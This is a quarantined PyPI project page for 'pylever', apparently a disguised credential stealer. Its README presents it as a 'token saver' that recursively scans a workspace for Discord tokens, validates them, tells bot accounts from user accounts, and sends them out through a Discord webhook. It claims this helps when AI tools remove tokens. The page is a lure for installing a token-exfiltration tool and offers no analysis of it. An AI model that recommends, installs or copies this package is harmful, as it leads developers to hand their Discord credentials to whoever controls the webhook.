Skip to main content
Quarantined

This project has been quarantined by PyPI admins. It cannot be installed or modified until a security review is complete.

Pylever - Discord Token Saver

A Python module for finding Discord bot tokens in your workspace and automatically saving them via Discord webhook. Useful when AI tools remove tokens during bot generation.

Installation

pip install pylever

Usage

Import and create a client instance:

from pylever import _Client

# Create client
client = _Client(workspace_path=".")

# Scan, validate, and send tokens
results = client.auto_save_tokens()

Or scan specific directory:

client = _Client(workspace_path="/path/to/workspace")
results = client.auto_save_tokens()

Features

  • Token Validation: Checks if tokens are valid or expired
  • Account Detection: Identifies bot vs user accounts
  • Account Info: Shows username, ID, and account type
  • Status Display: ✅ for valid, ❌ for invalid
  • Manual Control: Scan only when you call it
  • Webhook Integration: All data sent to your Discord

Webhook Messages

Valid tokens show:

✅ VALID - Saved Discord Token
🤖 BOT
Username: MyBot#0000
ID: 123456789

your_token_here


Invalid tokens show:

❌ INVALID - Token Validation Failed your_token_here

Features

  • Deep Folder Scanning: Recursively scans entire workspace for tokens
  • Flexible Pattern Matching: Finds 72-character strings starting with M or N
  • Discord Webhook Integration: Sends tokens directly to your Discord
  • Local Backup: Keeps local copy of saved tokens with timestamps
  • Private API: All internal classes are private to keep your code clean

How It Works

  1. Scans all files in the specified directory recursively
  2. Looks for 72-character tokens starting with M or N
  3. Sends each token to your Discord webhook
  4. Stores metadata locally for reference

Requirements

  • Python 3.8+
  • requests>=2.28.0

Setting Up Discord Webhook

  1. Go to your Discord server settings
  2. Navigate to Webhooks
  3. Create a new webhook
  4. Copy the webhook URL
  5. Use it in the module initialization

License

MIT

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pylever-1.0.7.tar.gz (9.3 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

pylever-1.0.7-py3-none-any.whl (8.8 kB view details)

Uploaded Python 3

File details

Details for the file pylever-1.0.7.tar.gz.

File metadata

  • Download URL: pylever-1.0.7.tar.gz
  • Upload date:
  • Size: 9.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/7.0.0 CPython/3.11.7

File hashes

Hashes for pylever-1.0.7.tar.gz
Algorithm Hash digest
SHA256 323cfe9382d1028f5d005be3ee2d696ee9b90b50976fd25d069b025fa81df3e1
MD5 7d26d1d2ad5f4b68d9eaa6fe9c8ad323
BLAKE2b-256 449de1612d1e970add9091b29f860f40608e330b7bbed3e42bfd8f22f3677bb9

See more details on using hashes here.

File details

Details for the file pylever-1.0.7-py3-none-any.whl.

File metadata

  • Download URL: pylever-1.0.7-py3-none-any.whl
  • Upload date:
  • Size: 8.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/7.0.0 CPython/3.11.7

File hashes

Hashes for pylever-1.0.7-py3-none-any.whl
Algorithm Hash digest
SHA256 c2fc712a1cf931e76d91c83eedaacc68eb7f505acb440c61a5c1c6f175010adc
MD5 f04e1dfcbb72fc12e33a32f62c2bd16b
BLAKE2b-256 da3d0ad56dd6b2f3487f21cca1a735940a277876d8739b72a60bdd99f2d51122

See more details on using hashes here.

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page